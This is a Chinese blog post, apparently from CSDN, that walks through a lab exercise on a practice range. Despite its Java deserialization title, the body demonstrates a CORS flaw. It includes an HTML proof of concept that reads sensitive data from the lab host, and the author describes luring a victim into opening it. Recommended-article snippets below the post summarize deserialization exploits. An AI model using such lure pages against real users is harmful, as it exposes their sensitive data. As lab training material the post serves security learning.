secExample靶场之java反序列化漏洞复现

最新推荐文章于 2024-10-11 17:43:06 发布
最新推荐文章于 2024-10-11 17:43:06 发布
阅读量458 收藏 1
点赞数 8
分类专栏: secExample靶场 文章标签: java 开发语言 web安全 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57240513/article/details/140851418
版权

我是使用kali虚拟机搭建的靶场,具体搭建步骤可以看我之前的博客内容。

访问靶机地址,打开java反序列化的

点进去后是如图的页面,随便输入一信息。

可以看到敏感信息直接显示在了页面上。

访问192.168.189.141:8080/cors1,可以看到敏感信息直接显示到了页面上。

抓包查看到有cors1漏洞

将以下代码保存为一个cors.html文件,诱惑受害者点击

<html>
	<head>
		<script type="text/javascript">
			// 当前窗口加载完毕,执行cors函数
		window.onload = function cors() {
			// 初始化一个xhttp变量
			var xhttp = new XMLHttpRequest();
			xhttp.onreadystatechange = function () {
				if (this.readyState == 4 && this.status == 200) {
					document.getElementById("demo").innerHTML = alert(
					this.responseText
					);
				}
			};
			xhttp.open("GET", "http://192.168.189.141:8080/cors1", true); // 只需要修改存在cors的url即可
			xhttp.withCredentials = false;
			xhttp.send();
		};
		</script>
	</head>
<body>
		<textarea id="demo"></textarea>
</body>
</html>

利用web服务器

将脚本放在web服务器上,将url发给受害者。但是没有受害者,我们自己模拟一下受害者访问url地址172.16.1.65/cors.html

Mr.sloane
关注
专栏目录
Vulhub靶场Dubbo Java反序列化漏洞复现
X_python321的博客
08-03 289
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架
java反序列化漏洞实战
weixin_34009794的博客
04-01 691
准备: 域名一个,用于增加NS解析,判断是否存在反序列化漏洞。 公网IP服务器一台,用于搭建DNS代理,抓包判断。 dnschef,DNS代理 ysoserial.jar生成payload. 简单的python脚本,调用ysoserial.jar并发送payload 首先域名增加一条A记录解析到公网IP服务,然后增加一条NS记录指向这条A记录。 然后公网IP服务器 开...
山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(十)-Java反序列化漏洞(2)
m0_47470899的博客
04-04 3515
目录前言:2、项目配置3、编写“java 反序列化漏洞”后端代码4、编写“java 反序列化漏洞”前端代码5、运行测试 前言: 本篇文章在上一篇文章基础上,学习了解 java 反序列化漏洞的基础知识后,现在开始进行漏洞环境的代码实现。 2、项目配置 编写 application.properties spring.thymeleaf.prefix = classpath:/templates/ pom.xml 导入相关依赖 <?xml version="1.0" encoding="UTF-8"
干货 JAVA靶机和漏洞练习平台推荐
最新发布
2401_84215240的博客
10-11 677
Java漏洞平台,结合漏洞代码和安全编码,帮助研发同学理解和减少漏洞,代码仅供参考。
反序列化漏洞靶场练习,漏洞复现
haozhe6666的博客
08-11 246
Apache Shiro是一款开源企业常见JAVA安全框架,此框架提供了RememberMe的功能,这是很多网站 都具备的,例如你登录了一个网站,关掉浏览器再次打开网站时,网站会保留你的登录信息情况。shiro默认使用了CookieRememberMeManager函数,其处理cookie的流程是:得到rememberMe的 cookie值–>Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞
Java反序列化漏洞及实例详解
ran的博客
04-15 4193
在这里我们将其原有的代码数据更改成了一个访问http的代码数据,当对方在进行反序列化的时候,就会将我们更改后的代码数据进行执行,就会对http进行访问。5.至此,我们可以想到,如果将反序列化的目标文件的内容进行修改,修改成具有攻击性的代码,那么就可以实现一定的攻击性行为。2.执行序列化部分的代码,可以看到在指定路径下生成了指定的文件,文件内包含序列化的内容。执行反序列化部分的代码,可以看到其反序列化成功,并且将原始的内容进行了返回。6.来到目标路径下可以看到生成的文件,以及文件内的序列化内容。
反序列化漏洞靶机实战-serial
zzz6583zz的博客
08-22 879
首先我们在自己的web根目录下新建一个3.txt文件,内容为<?下载解压得到三个文件,里面放着网站的源代码,这里就需要代码审计了,在index.php中我们可以看到user.class.php,它包含了user.class.php文件的代码,然后将cookie中的user的值进行base64编码。我们在靶机网站首页开启抓包,然后刷新网页,获取到数据包,将其发送到重放器后,用我们构造的经过序列化和base64编码后的pyload去替换user后的内容然后发送即可得到passwd文件内容。
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
靶机实操—JARBAS—学习笔记
qq_46965422的博客
03-13 384
Jarbas 1.0 – 向 90 年代末怀旧的巴西搜索引擎致敬。 目标:获取 root shell!
普通人千万不要学什么黑客技术,这里面的水太深了
m0_61101264的博客
08-29 323
普通人千万不要学什么黑客技术,这里面的水可深了,小心把你淹死,不信你听我讲。如果你只是想学点Win Nuke和NET BUS脚本工具,去攻击或者植入一些东西,那你最多只能算个脚本小子,装装逼还可以,但啥也干不了。如果你想学成为黑客高手,你要学的应该是计算机网络、渗透测试、数据库、编程语言漏洞检测和内网渗透等技术点。如果你能掌握这些东西,不管你是想去当网络安全工程师,还是在家自己接私活,一个月拿五位数的收入不是问题,但是如果只有三分钟热度的话,我劝你还是别折腾了,几天就能学会的东西那就不叫技术了。
搭建一个java反序列化靶场
热门推荐
leeezp的博客
09-09 32万+
java反序列化漏洞研究需要。搭建一个java反序列化靶场
基于Java环境漏洞攻击目标
m0_71109835的博客
01-25 216
基于Java环境漏洞攻击目标
(38)【JAVA反序列化漏洞】简介、原理、工具、环境、靶场、思路
04-23 3886
【专题】JAVA反序列化
p85 CTF夺旗-JAVA考点反编译&XXE&反序列化
weixin_43263566的博客
03-28 1965
p85 CTF夺旗-JAVA考点反编译&XXE&反序列化
渗透测试之靶机试炼(一)
simple___sunny的博客
01-10 1万+
1
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)
JiangBuLiu的博客
07-10 8363
Jackson-databind 反序列化漏洞(CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
java反序列化漏洞复现
07-28
回答: 要复现Java反序列化漏洞,你需要了解具体的漏洞细节和利用方法。其中一种常见的Java反序列化漏洞Weblogic的CVE-2017-10271和CVE-2018-2628。这些漏洞可以通过构造恶意的序列化数据来执行任意代码。你可以参考相关的文章和工具来进行复现。例如,可以使用Weblogic的wls-wsat组件或Fastjson库中的漏洞来进行复现。请注意,在进行漏洞复现时,务必在合法的环境中进行,并遵守法律和道德规范。 #### 引用[.reference_title] - *1* [复现java反序列化漏洞的方法](https://blog.csdn.net/weixin_47623655/article/details/129866121)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [JAVA反序列化系列漏洞复现](https://blog.csdn.net/qq_36119192/article/details/90716180)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值